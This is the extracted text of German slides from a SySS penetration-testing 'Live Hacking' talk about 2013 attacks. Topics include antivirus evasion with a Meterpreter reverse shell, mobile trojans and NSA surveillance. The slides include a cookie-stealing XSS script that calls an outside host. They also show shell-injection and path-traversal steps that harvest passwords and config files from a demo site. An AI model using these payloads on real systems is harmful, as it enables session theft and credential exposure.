Live HackingLive Hacking
Dipl. Inform. Sebastian [email protected]
SySS GmbHwww.SySS.deWohlboldstr. 8
72072 TübingenDeutschland
Live HackingLive Hacking18:00 Uhr 18:00 Uhr –– 19:00 Uhr19:00 Uhr
AgendaAgenda1. Einfache Angriffe gegen Shop-System2. iOS-Angriff mit Ladegerät3. Gesperrtes iPad knacken4. Angriffe gegen vier Krypto-USB-Sticks5. Handy-Trojaner6. Virenscanner täuschen7. SQL-Injections in Barcodes
2
7. SQL-Injections in BarcodesFalls Zeit:
1. Angriffe auf gestohlene Passwort-Hashes2. Boot-Angriff Windows Laptop3. Handy-Lock-Code umgehen4. BIOS-Hack5. Mogeln bei Moorhuhn – Computerspiele knacken6. SMS-Spoofing7. EC-Karten und Kreditkarten knacken8. Klassische USB-Angriffe & Trojaner der Zukunft
iPhoneiPhone//iPadiPad--HackHack
3
Antivirus EvasionAntivirus Evasion� Funktionsweise von Antivirensoftware:
1. Blacklisting2. Whitelisting
� Blacklisting-Methoden: Funktionsweise und Schwächen1. signaturbasiert
• Suche nach bekannten Mustern• unbekannte Schadsoftware kann nicht erkannt werden• Polymorphie von Schadsoftware wird seit langem ausgenutzt, um
signaturbasierte Erkennung zu umgehen2. verhaltensbasiert
4
2. verhaltensbasiert• Klassifikation von Programmen in gut- oder bösartig anhand deren
Verhaltens• üblicherweise regelbasierte Techniken in Kombination mit einem Scoring-
Verfahren und festgelegten Schwellenwerten für berechnete Scores(heuristisches Verfahren)
• statische Codeanalyse• Es kann nur der Programmcode anaysiert werden, der innerhalb der
ausführbaren Datei unmittelbar zugreifbar ist.• dynamische Codeanalyse zur Laufzeit (Sanbox-Umgebung)
• diverse Einschränkungen der Sandbox-Umgebung (z. B. Zeit, bestimmte Benutzeraktionen [Mausklick, etc.])
Antivirus EvasionAntivirus Evasion
Live Demonstration
� Beispiel für Antivirensoftware: Microsoft Security Essentials� Kostenloser Schutz vor Schadsoftware für Heimanwender und
Kleinunternehmen� Nutzt dieselbe Technologie und Scan-Engine wie System
Center 2012 Endpoint Protection (früher Forefront Endpoint Protection)
5
Protection)� Erstellen einer ausführbaren Datei mit bekanntem Schadcode unter
Verwendung des Software-Tools ShCoLo der SySS GmbH� Einsatz der folgenden Antivirus-Evasion-Techniken:
1. Polymorphie2. Verschlüsselung + Kompression3. Erkennung von Sandbox-Umgebungen (Sandbox Detection)
� Schadcode: Meterpreter-Shell (windows/meterpreter/reverse_https) des Metasploit Framework
Antivirus Evasion: TestergebnisseAntivirus Evasion: Testergebnisse
Produktname Version Datum der Virendefinitions
datei
Betriebssystem(e) des Zielsystems
Avira AntiVir Professional 10.2.0.1064 21.05.2013 Windows XP SP 3 (32 Bit)Windows 7 SP 1 (64 Bit)
AVG Free 2013.0.2904 20.05.2013 Windows XP SP 3 (32 Bit)
Kaspersky Endpoint 8.1.0.831 21.05.2013 Windows XP SP 3 (32 Bit)
6
Kaspersky Endpoint Protection Workstation
8.1.0.831 21.05.2013 Windows XP SP 3 (32 Bit)
McAfee SaaS Endpoint Protection
5400.1158 20.05.2013 Windows 7 SP 1 (64 Bit)
Microsoft Security Essentials
4.1.522.0 21.05.2013 Windows XP SP 3 (32 Bit)
Sophos Endpoint Security and Control
10.2 21.05.2013 Windows XP SP 3 (32 Bit)
Symantec Endpoint Protection
12.1.1101.401 27.05.2013 Windows 7 SP 1 (64 Bit)
SySSSySS� Gegründet 1998� 44 Angestellte + 2 Externe� Sitz in Tübingen� Seit 2009 im eigenen Bürogebäude� Deutschlandweit und teilweise europaweit/weltweit tätig.� Dienstleistungen:
� Penetration Testing� Kunden:
7
� Kunden:HP, Bosch, Bosch-Rexroth, Siemens, European Commission, Union Investment, Grundig AG, Lufthansa, INA/Schäffler, TÜV München, T-Systems, T-Com, Neckermann, Österreichische Nationalbank, Deutsche Flugsicherung, Bundeswehr, SAP AG, BMW, Audi AG, Daimler-Chrysler AG, Transtec AG, LKA Niedersachsen, Schufa, Gebr. Heller Maschinenfabrik, Europäische Zentralbank, Festo AG, Roland-Rechtsschutz, Basler Versicherung, Kodak, Heller Bank, Baader Wertpapierbank, Fielmann AG, Deka-Bank etc.
Mobile phone trojanMobile phone trojan
� Symbian phone
� 0049-177-6397937� SMS forwarding
� activate the microphone
8
� activate the microphone
� Reboot
� Location info
FIPS 140FIPS 140--2 2 certifiedcertified cryptocryptoUSB USB stickssticks
9
Brandneuer Angriff auf Brandneuer Angriff auf KryptoKrypto--StickStick
10
XSSXSS
<script>window.open('http://www.syss.de /cookie.html?'+document.cookie)</script>
11
NSANSA--AffaireAffaire von 2013von 2013
Bis 2013„Experten ahnen, dass Emails abgehört werden“(„Spook“ in Mailprogrammen seit 15 Jahren)
Ab 2013 Gesichertes Wissen:1. Telefonate werden abgehört
12
1. Telefonate werden abgehört2. SMS/Telfonate werden abgehört3. Die NSA beeinflusst Krypto-
Standards4. Alle Handy-Hersteller arbeiten mit
der NSA zusammen
13
14
Schutz gegen Schutz gegen PRISM, Tempora, PRISM, Tempora, KeyScoreKeyScore
1.Abstinenz: Vermeidung elektronischer Kommunikation
2.Bewusstsein3.Chiffrierung
15
3.Chiffrierung4.Distanzierung von amerikanischen
Betriebssystemen (Android, Microsoft, Apple) und Diensten (Facebook, Gmail, iCloud, etc)
InjectionsInjections, PHP Magic , PHP Magic QuotesQuotes
1) http://livehack.syss.de/infoboard/index.php?mod=search2) Suche nach z.B. SySS3) Suche nach !"§$%&/()=?`‘‚4) Conclusio: PHP Magic Quotes 5) Suche nach SySS $(sleep 4)6) $(grep -r -i password * > /tmp/passwd)
16
6) $(grep -r -i password * > /tmp/passwd)7) http://livehack.syss.de/infoboard/index.php?mod=/infoboard/index.php?mod=../../../t
mp/passwd8) Suchen nach $(cat inc/userdata.inc.php | base64 > /tmp/userdata.txt)9) http://livehack.syss.de/infoboard/index.php?mod=/infoboard/index.php?mod=../../../t
mp/userdata.txt
Vielen Dank für Ihre Vielen Dank für Ihre AufmerksamkeitAufmerksamkeit
- Noch Fragen? [email protected] Material: [email protected]
17
Vielen Dank für Ihre Vielen Dank für Ihre AufmerksamkeitAufmerksamkeit
- Noch Fragen? [email protected] Material: [email protected]
18
- Penetrationstests: [email protected]
Top Related